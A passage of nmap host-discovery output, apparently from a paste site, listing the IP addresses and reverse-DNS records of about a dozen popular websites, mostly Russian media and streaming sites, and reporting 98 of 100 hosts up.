  3509.  
  3510. Rg.ru (195.16.117.240)
  3511.  
  3512.  
  3513. Twitch.tv (192.16.71.165)
  3514. Other addresses for Twitch.tv (not scanned): 192.16.71.180 192.16.71.176 192.16.71.166 192.16.71.189 192.16.71.179 192.16.71.168 192.16.71.167
  3515. rDNS record for 192.16.71.165: reserved.justin.tv
  3516.  
  3517. Tumblr.com (66.6.41.30)
  3518. Other addresses for Tumblr.com (not scanned): 66.6.42.30 66.6.43.30
  3519.  
  3520. 1tv.ru (81.177.156.116)
  3521. Other addresses for 1tv.ru (not scanned): 81.177.156.117
  3522.  
  3523. Lostfilm.tv (185.85.120.10)
  3524. rDNS record for 185.85.120.10: lostfilm.tv
  3525.  
  3526. Rt.com (37.48.108.112)Other addresses for Rt.com (not scanned): 207.244.80.166
  3527.  
  3528. Rutube.ru (91.207.59.161)
  3529.  
  3530.  
  3531. Kommersant.ru (195.68.141.169) [host down]Other addresses for Kommersant.ru (not scanned): 195.68.141.180 195.68.141.146
  3532.  
  3533. Bigcinema.tv (78.108.183.161)
  3534. rDNS record for 78.108.183.161: bigcinema.tv
  3535.  
  3536. Stackoverflow.com (104.16.36.249)Other addresses for Stackoverflow.com (not scanned): 104.16.34.249 104.16.35.249 104.16.37.249 104.16.33.249
  3537.  
  3538. Tass.ru (178.248.232.9)
  3539.  
  3540.  
  3541. Banki.ru (178.248.232.19)
  3542.  
  3543. Host is up.
  3544. rDNS record for 127.0.0.1: localhost
  3545. Read data files from: /usr/bin/../share/nmap
  3546. Nmap done: 100 IP addresses (98 hosts up) scanned in 21.85 seconds
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement